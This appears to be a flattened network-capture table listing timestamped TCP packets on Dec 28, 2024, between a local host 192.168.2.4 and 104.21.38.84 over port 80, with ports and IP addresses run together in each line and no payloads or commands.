                                                                        Dec 28, 2024 20:43:34.281681061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.286019087 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.306688070 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.306890011 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.306945086 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.306982994 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.307214022 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.409171104 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.409286022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.429429054 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.657371998 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.779102087 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.779112101 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.779139996 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.820050955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.822065115 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.941576958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.154851913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.155025959 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.274585962 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.274897099 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.485979080 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.565001011 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.638271093 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.641242027 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.737128019 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.760818005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.857160091 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.857973099 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.973993063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.974190950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.977144957 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.977231979 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.977597952 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.977714062 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.978044987 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.093746901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.093801975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.097567081 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.329363108 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.449099064 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.449141979 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.449311018 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.604887009 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.606076002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.732461929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.954319954 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.073944092 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.074177027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.164074898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.204344034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.778947115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.779742002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.801753044 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.906003952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.907274008 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.107362986 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.126104116 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.204253912 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.234500885 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.235090971 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.237289906 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.245804071 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.246025085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354460955 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354542017 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.354617119 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354706049 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.354841948 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.407398939 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.474436998 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.680568933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.704314947 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.823862076 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.823873043 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.823883057 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.907277107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.933027983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.933804035 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.053306103 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.282361984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.394028902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.402162075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.402352095 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.594784021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.848402023 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.891685009 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.086711884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.091928005 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.133791924 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.188555002 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.214627981 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.249716043 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.250682116 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.369570017 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.369631052 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.370141029 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.370630980 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.370738983 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.427592039 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.430212021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.490233898 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.549803972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.549856901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.719938040 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.839607000 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.839637041 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.839684963 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.956479073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.958429098 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.078051090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.290894032 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.291065931 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.410594940 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.410689116 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.547317028 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.594793081 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.805100918 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.821193933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:41.822612047 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.860403061 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.922101974 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.922786951 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:41.942162037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.042319059 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.042417049 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.042500973 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.042610884 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.042717934 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.154839993 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.155237913 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.162164927 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.275366068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.275393009 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.391854048 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.511714935 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.511751890 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.511869907 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.678544998 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:42.679354906 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:42.800257921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.012837887 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.013009071 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.127501011 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.134016037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.134044886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.205153942 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.369401932 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.483138084 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.484178066 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.545752048 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.552705050 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.607445002 CET8049853104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.607501984 CET4985380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.608092070 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.608161926 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.608306885 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.674942970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.727859974 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:43.907648087 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:43.954256058 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.132551908 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.132905006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.132920027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.132936001 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.132951021 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.132966042 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.204562902 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.266786098 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.268130064 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.435580015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.440052032 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.559942007 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.739018917 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.774708033 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.776390076 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.890640974 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:44.896089077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.896173000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:44.987900019 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.110358000 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.111155987 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.230293036 CET8049858104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.230356932 CET4985880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.230635881 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.230695963 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.230799913 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.305099010 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.305903912 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.350266933 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.425549030 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.579380989 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.638315916 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.638484955 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:45.699827909 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.699912071 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.700005054 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.758261919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:45.758385897 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.129183054 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.131026983 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.252022982 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.315700054 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.407382965 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.485490084 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.586424112 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.586679935 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.605182886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.704180002 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.704193115 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.706060886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.719716072 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.720889091 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.839893103 CET8049860104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.839993954 CET4986080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.840481997 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:46.840559006 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.840744972 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:46.960768938 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.014005899 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.014933109 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:47.136117935 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.188683987 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:47.308564901 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.308592081 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.308608055 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.348870993 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.349049091 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:47.471215963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.471359968 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.875616074 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.876610041 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:47.972851992 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:47.996328115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.094805002 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.209214926 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.209419012 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.222664118 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.328918934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.329114914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.343739033 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.344342947 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.463587999 CET8049866104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.463649035 CET4986680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.463778019 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.463844061 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.464011908 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.583426952 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.741763115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.744401932 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.813771009 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:48.866964102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.933583975 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.933598042 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:48.933610916 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.079763889 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.079940081 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:49.200184107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.200210094 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.602549076 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.606992960 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.608824015 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:49.704169989 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:49.730149984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.843803883 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.942941904 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:49.943101883 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:49.968121052 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:49.968841076 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.062685013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.062762022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.088058949 CET8049871104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.088203907 CET4987180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.088398933 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.092458963 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.092655897 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.213002920 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.438827991 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.469407082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.470355034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.558476925 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.558491945 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.558579922 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.589924097 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.802674055 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.804949999 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:50.924731970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:50.924892902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.226088047 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.266666889 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.334132910 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.334904909 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.460309982 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.467955112 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.516670942 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.627332926 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.631304979 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.673079014 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.673233032 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.747257948 CET8049874104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.747332096 CET4987480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.750833035 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.750900984 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.751000881 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:51.792753935 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.793031931 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:51.870559931 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.110512972 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:52.207911015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.208861113 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:52.230221033 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.230236053 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.230285883 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.328691006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.541337967 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.541593075 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:52.661328077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.661340952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.881959915 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:52.922921896 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.067698002 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.068439960 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.125525951 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.172949076 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.187939882 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.250226974 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.251147032 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.370987892 CET8049879104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.371010065 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.371032953 CET4987980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.371069908 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.371210098 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.408242941 CET8049734104.21.38.84192.168.2.4
